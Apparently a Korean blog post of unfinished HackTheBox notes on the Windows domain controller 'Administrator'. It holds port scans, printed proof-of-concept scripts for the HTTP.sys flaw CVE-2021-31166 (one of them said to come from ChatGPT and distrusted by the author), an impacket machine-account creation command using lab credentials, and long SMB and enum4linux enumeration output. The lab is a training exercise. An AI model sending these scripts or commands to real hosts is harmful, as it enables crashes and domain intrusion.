윈도우 스타트~
Enumeration
└─# nmap -p- -sT --min-rate=10000 10.129.2.205
Starting Nmap 7.94SVN ( https://nmap.org/ ) at 2024-11-26 18:48 KST
Warning: 10.129.2.205 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.2.205
Host is up (0.28s latency).
Not shown: 59555 closed tcp ports (conn-refused), 5956 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49670/tcp open unknown
61518/tcp open unknown
61523/tcp open unknown
61526/tcp open unknown
61543/tcp open unknown
시작되었나..
Nmap: the Network Mapper - Free Security Scanner
Nmap Free Security Scanner, Port Scanner, & Network Exploration Tool. Download open source software for Linux, Windows, UNIX, FreeBSD, etc.
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-26 16:52:09Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
| Message signing enabled and required
| smb2-time:
| date: 2024-11-26T16:53:02
|_ start_date: N/A
|_clock-skew: 6h59m59s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 79.24 seconds
httpapi 쪽에 뭐가 있을 까 기웃기웃
아 ftp anonymous 도 안되고,
https://github.com/0vercl0k/CVE-2021-31166?tab=readme-ov-file
GitHub - 0vercl0k/CVE-2021-31166: Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely.
Proof of concept for CVE-2021-31166, a remote HTTP.sys use-after-free triggered remotely. - 0vercl0k/CVE-2021-31166
github.com
이것 될리가 없겠지 ㅎㅎ
링크 했으니, 설명하자면..
=>
Windows HTTP Protocol Stack (HTTP.sys)에서 발견된 원격 코드 실행(RCE) 취약점
=> 공격자가 원격에서 악의적으로 조작된 HTTP 요청을 보내면, HTTP Protocol Stack의 메모리 관리를 악용
(무려 UAF이시다) 하여 코드를 실행
모 대충 될리가 없다는 말이고,
주요 정보
- 취약점 ID: CVE-2021-31166
- CVSS 점수: 9.8 (Critical)
- 취약점 유형: Remote Code Execution (RCE)
- 취약 대상:
- Windows 10 버전 2004 (Build 19041.985)
- Windows 10 버전 20H2 (Build 19042.985)
- Windows Server 20H2
- 취약점 패치: Microsoft는 2021년 5월 11일 보안 업데이트를 통해 패치를 제공.
취약점의 원인
HTTP.sys는 Windows의 HTTP 프로토콜 처리를 담당하는 드라이버로, HTTP 요청을 처리하는 과정에서 메모리 관리가 적절히 이루어지지 않아 메모리 손상이 발생할 수 있습니다. 이 취약점은 HTTP 헤더에서 범위 요청(range header) 처리와 관련된 문제로, 조작된 헤더 값이 메모리 손상을 유발할 수 있습니다.
- 공격자는 악의적으로 설계된 HTTP 요청을 보내 대상 서버의 HTTP.sys를 이용하여 메모리를 손상시킵니다.
- 이로 인해 커널 권한에서 임의 코드를 실행하거나 DoS를 발생시킬 수 있습니다.
취약점 악용 조건
- HTTP.sys가 활성화된 Windows 시스템:
- HTTP.sys는 IIS(Internet Information Services) 및 HTTP 기반 서비스에서 사용됩니다.
- 대상 시스템에서 HTTP.sys를 사용하는 서비스가 활성화되어 있어야 합니다.
- 네트워크 접근 가능:
- 공격자는 로컬 네트워크 또는 인터넷을 통해 HTTP 요청을 보내 시스템을 공격할 수 있습니다.
chatgpt 가 알려준건 이거
import socket
# 대상 IP와 포트 설정
target = "192.168.1.10" # 변경 필요
port = 80
# 악성 HTTP 요청 생성
payload = (
"GET / HTTP/1.1\r\n"
"Host: {}\r\n".format(target) +
"Range: bytes=0-18446744073709551615\r\n" # 조작된 Range 헤더
"\r\n"
)
# 소켓 생성 및 전송
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect((target, port))
s.send(payload.encode())
response = s.recv(1024)
print(response.decode())# Axel '0vercl0k' Souchet - May 16 2021
import requests
import argparse
def main():
parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys')
parser.add_argument('--target', required = True)
args = parser.parse_args()
r = requests.get(f'http://{args.target}/', headers = {
'Accept-Encoding': 'doar-e, ftw, imo, ,',
})
print(r)
main()둘다 믿을 수가 없다.
와중에 서버 재기동 하면, 계정정보가 뜬다는 것을 동료가 발견~
신나는(신나는? 어의가 없네.. 어의? 어의 거 관상가 양반..) 맘에 PC도 만들어보고
└─# python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -dc-ip 10.129.2.205 administrator.htb0/olivia:ichliebedich -computer-name NEWCOMPUTER$
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account NEWCOMPUTER$ with password G5NGEcQcVSgeQu2VTEXvWJ1OfW3Q0sjW.
모 evil-winrm 으로 olivia 계정 접속이 가능하다.
sharphound upload 에서 파일 덤프하고,
bloodhound 를 해보는데, 로컬에 설치한 bloodhound 가 몬가 이상한듯하다.
도커로 해봐야겠다 다음에....
아.. enum4linux 결과 보관..
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient -L 10.129.2.205 -U Olivia
Password for [WORKGROUP\Olivia]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.2.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/C$ -U Olivia
Password for [WORKGROUP\Olivia]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/C$ -U Olivia
Password for [WORKGROUP\Olivia]:
tree connect failed: NT_STATUS_ACCESS_DENIED
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/NETLOGON -U Olivia
Password for [WORKGROUP\Olivia]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> cd ..
smb: \> ls
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> exut
exut: command not found
smb: \> exit
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# smbclient //10.129.2.205/SYSVOL -U Olivia
Password for [WORKGROUP\Olivia]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:48:08 2024
administrator.htb Dr 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> cd administrator.htb\
smb: \administrator.htb\> dir
. D 0 Sat Oct 5 04:54:15 2024
.. D 0 Sat Oct 5 04:48:08 2024
DfsrPrivate DHSr 0 Sat Oct 5 04:54:15 2024
Policies D 0 Sat Oct 5 04:48:32 2024
scripts D 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \administrator.htb\> cd DfsrPrivate\
cd \administrator.htb\DfsrPrivate\: NT_STATUS_ACCESS_DENIED
smb: \administrator.htb\> cd scripts
smb: \administrator.htb\scripts\> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:54:15 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \administrator.htb\scripts\> cd ..
smb: \administrator.htb\> cd Polices
cd \administrator.htb\Polices\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \administrator.htb\> cd ..
smb: \> cd ..
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:48:08 2024
administrator.htb Dr 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> cd .
smb: \> dir
. D 0 Sat Oct 5 04:48:08 2024
.. D 0 Sat Oct 5 04:48:08 2024
administrator.htb Dr 0 Sat Oct 5 04:48:08 2024
5606911 blocks of size 4096. 1295917 blocks available
smb: \> enum4linux -a -u
enum4linux: command not found
smb: \> exit
┌──(root㉿P00075445-006)-[/mnt/c/Users/LGCNS/Downloads]
└─# enum4linux -a -u Olivia -p ichliebedich 10.129.2.205
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Nov 26 21:18:28 2024
=========================================( Target Information )=========================================
Target ........... 10.129.2.205
RID Range ........ 500-550,1000-1050
Username ......... 'Olivia'
Password ......... 'ichliebedich'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.129.2.205 )============================
[E] Can't find workgroup/domain
================================( Nbtstat Information for 10.129.2.205 )================================
Looking up status of 10.129.2.205
No reply from 10.129.2.205
===================================( Session Check on 10.129.2.205 )===================================
[+] Server 10.129.2.205 allows sessions using username 'Olivia', password 'ichliebedich'
================================( Getting domain SID for 10.129.2.205 )================================
Domain Name: ADMINISTRATOR
Domain Sid: S-1-5-21-1088858960-373806567-254189436
[+] Host is part of a domain (not a workgroup)
===================================( OS information on 10.129.2.205 )===================================
[E] Can't get OS info with smbclient
[+] Got OS info for 10.129.2.205 from srvinfo:
10.129.2.205 Wk Sv PDC Tim NT
platform_id : 500
os version : 10.0
server type : 0x80102b
=======================================( Users on 10.129.2.205 )=======================================
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xfc0 RID: 0xe11 acb: 0x00000211 Account: alexander Name: Alexander Smith Desc: (null)
index: 0xfb8 RID: 0x456 acb: 0x00000210 Account: benjamin Name: Benjamin Brown Desc: (null)
index: 0xfbe RID: 0x458 acb: 0x00000210 Account: emily Name: Emily Rodriguez Desc: (null)
index: 0xfc1 RID: 0xe12 acb: 0x00000211 Account: emma Name: Emma Johnson Desc: (null)
index: 0xfbf RID: 0x459 acb: 0x00000210 Account: ethan Name: Ethan Hunt Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xfb7 RID: 0x455 acb: 0x00000210 Account: michael Name: Michael Williams Desc: (null)
index: 0xfb6 RID: 0x454 acb: 0x00000214 Account: olivia Name: Olivia Johnson Desc: (null)
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[olivia] rid:[0x454]
user:[michael] rid:[0x455]
user:[benjamin] rid:[0x456]
user:[emily] rid:[0x458]
user:[ethan] rid:[0x459]
user:[alexander] rid:[0xe11]
user:[emma] rid:[0xe12]
=================================( Share Enumeration on 10.129.2.205 )=================================
do_connect: Connection to 10.129.2.205 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
Unable to connect with SMB1 -- no workgroup available
[+] Attempting to map shares on 10.129.2.205
//10.129.2.205/ADMIN$ Mapping: DENIED Listing: N/A Writing: N/A
//10.129.2.205/C$ Mapping: DENIED Listing: N/A Writing: N/A
[E] Can't understand response:
NT_STATUS_NO_SUCH_FILE listing \*
//10.129.2.205/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//10.129.2.205/NETLOGON Mapping: OK Listing: OK Writing: N/A
//10.129.2.205/SYSVOL Mapping: OK Listing: OK Writing: N/A
============================( Password Policy Information for 10.129.2.205 )============================
[+] Attaching to 10.129.2.205 using Olivia:ichliebedich
[+] Trying protocol 139/SMB...
[!] Protocol failed: Cannot request session (Called Name:10.129.2.205)
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] ADMINISTRATOR
[+] Builtin
[+] Password Info for Domain: ADMINISTRATOR
[+] Minimum password length: 7
[+] Password history length: 24
[+] Maximum password age: 41 days 23 hours 53 minutes
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: 1 day 4 minutes
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 7
=======================================( Groups on 10.129.2.205 )=======================================
[+] Getting builtin groups:
group:[Server Operators] rid:[0x225]
group:[Account Operators] rid:[0x224]
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a]
group:[Incoming Forest Trust Builders] rid:[0x22d]
group:[Windows Authorization Access Group] rid:[0x230]
group:[Terminal Server License Servers] rid:[0x231]
group:[Administrators] rid:[0x220]
group:[Users] rid:[0x221]
group:[Guests] rid:[0x222]
group:[Print Operators] rid:[0x226]
group:[Backup Operators] rid:[0x227]
group:[Replicator] rid:[0x228]
group:[Remote Desktop Users] rid:[0x22b]
group:[Network Configuration Operators] rid:[0x22c]
group:[Performance Monitor Users] rid:[0x22e]
group:[Performance Log Users] rid:[0x22f]
group:[Distributed COM Users] rid:[0x232]
group:[IIS_IUSRS] rid:[0x238]
group:[Cryptographic Operators] rid:[0x239]
group:[Event Log Readers] rid:[0x23d]
group:[Certificate Service DCOM Access] rid:[0x23e]
group:[RDS Remote Access Servers] rid:[0x23f]
group:[RDS Endpoint Servers] rid:[0x240]
group:[RDS Management Servers] rid:[0x241]
group:[Hyper-V Administrators] rid:[0x242]
group:[Access Control Assistance Operators] rid:[0x243]
group:[Remote Management Users] rid:[0x244]
group:[Storage Replica Administrators] rid:[0x246]
[+] Getting builtin group memberships:
Group: Windows Authorization Access Group' (RID: 560) has member: NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Group: Remote Management Users' (RID: 580) has member: ADMINISTRATOR\olivia
Group: Remote Management Users' (RID: 580) has member: ADMINISTRATOR\michael
Group: Remote Management Users' (RID: 580) has member: ADMINISTRATOR\emily
Group: Administrators' (RID: 544) has member: ADMINISTRATOR\Administrator
Group: Administrators' (RID: 544) has member: ADMINISTRATOR\Enterprise Admins
Group: Administrators' (RID: 544) has member: ADMINISTRATOR\Domain Admins
Group: Guests' (RID: 546) has member: ADMINISTRATOR\Guest
Group: Guests' (RID: 546) has member: ADMINISTRATOR\Domain Guests
Group: Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
Group: Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
Group: Users' (RID: 545) has member: ADMINISTRATOR\Domain Users
Group: Pre-Windows 2000 Compatible Access' (RID: 554) has member: NT AUTHORITY\Authenticated Users
[+] Getting local groups:
group:[Cert Publishers] rid:[0x205]
group:[RAS and IAS Servers] rid:[0x229]
group:[Allowed RODC Password Replication Group] rid:[0x23b]
group:[Denied RODC Password Replication Group] rid:[0x23c]
group:[DnsAdmins] rid:[0x44d]
group:[Share Moderators] rid:[0x457]
[+] Getting local group memberships:
Group: Share Moderators' (RID: 1111) has member: ADMINISTRATOR\benjamin
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\krbtgt
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Domain Controllers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Schema Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Enterprise Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Cert Publishers
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Domain Admins
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Group Policy Creator Owners
Group: Denied RODC Password Replication Group' (RID: 572) has member: ADMINISTRATOR\Read-only Domain Controllers
[+] Getting domain groups:
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
[+] Getting domain group memberships:
Group: 'Domain Controllers' (RID: 516) has member: ADMINISTRATOR\DC$
Group: 'Domain Guests' (RID: 514) has member: ADMINISTRATOR\Guest
Group: 'Enterprise Admins' (RID: 519) has member: ADMINISTRATOR\Administrator
Group: 'Schema Admins' (RID: 518) has member: ADMINISTRATOR\Administrator
Group: 'Group Policy Creator Owners' (RID: 520) has member: ADMINISTRATOR\Administrator
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\Administrator
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\krbtgt
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\olivia
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\michael
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\benjamin
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\emily
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\ethan
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\alexander
Group: 'Domain Users' (RID: 513) has member: ADMINISTRATOR\emma
Group: 'Domain Admins' (RID: 512) has member: ADMINISTRATOR\Administrator
==================( Users on 10.129.2.205 via RID cycling (RIDS: 500-550,1000-1050) )==================
[I] Found new SID:
S-1-5-21-1088858960-373806567-254189436
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-32
[I] Found new SID:
S-1-5-21-1088858960-373806567-254189436
[+] Enumerating users using SID S-1-5-21-222597205-3069252932-3630732940 and logon username 'Olivia', password 'ichliebedich'
S-1-5-21-222597205-3069252932-3630732940-500 DC\Administrator (Local User)
S-1-5-21-222597205-3069252932-3630732940-501 DC\Guest (Local User)
S-1-5-21-222597205-3069252932-3630732940-503 DC\DefaultAccount (Local User)
S-1-5-21-222597205-3069252932-3630732940-504 DC\WDAGUtilityAccount (Local User)
S-1-5-21-222597205-3069252932-3630732940-513 DC\None (Domain Group)
[+] Enumerating users using SID S-1-5-32 and logon username 'Olivia', password 'ichliebedich'
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-82-3006700770-424185619-1745488364-794895919 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-80-3139157870-2983391045-3678747466-658725712 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-90 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-21-1088858960-373806567 and logon username 'Olivia', password 'ichliebedich'
[+] Enumerating users using SID S-1-5-21-1088858960-373806567-254189436 and logon username 'Olivia', password 'ichliebedich'
S-1-5-21-1088858960-373806567-254189436-500 ADMINISTRATOR\Administrator (Local User)
S-1-5-21-1088858960-373806567-254189436-501 ADMINISTRATOR\Guest (Local User)
S-1-5-21-1088858960-373806567-254189436-502 ADMINISTRATOR\krbtgt (Local User)
S-1-5-21-1088858960-373806567-254189436-512 ADMINISTRATOR\Domain Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-513 ADMINISTRATOR\Domain Users (Domain Group)
S-1-5-21-1088858960-373806567-254189436-514 ADMINISTRATOR\Domain Guests (Domain Group)
S-1-5-21-1088858960-373806567-254189436-515 ADMINISTRATOR\Domain Computers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-516 ADMINISTRATOR\Domain Controllers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-517 ADMINISTRATOR\Cert Publishers (Local Group)
S-1-5-21-1088858960-373806567-254189436-518 ADMINISTRATOR\Schema Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-519 ADMINISTRATOR\Enterprise Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-520 ADMINISTRATOR\Group Policy Creator Owners (Domain Group)
S-1-5-21-1088858960-373806567-254189436-521 ADMINISTRATOR\Read-only Domain Controllers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-522 ADMINISTRATOR\Cloneable Domain Controllers (Domain Group)
S-1-5-21-1088858960-373806567-254189436-525 ADMINISTRATOR\Protected Users (Domain Group)
S-1-5-21-1088858960-373806567-254189436-526 ADMINISTRATOR\Key Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-527 ADMINISTRATOR\Enterprise Key Admins (Domain Group)
S-1-5-21-1088858960-373806567-254189436-1000 ADMINISTRATOR\DC$ (Local User)'Hacking > HackTheBox' 카테고리의 다른 글
| cicada (0) | 2025.04.09 |
|---|---|
| Sniper (0) | 2025.03.27 |
| Certified (Windows · Medium) (0) | 2024.11.11 |
| aragog (Linux) (1) | 2024.11.04 |
| Devel (win) (1) | 2024.10.23 |
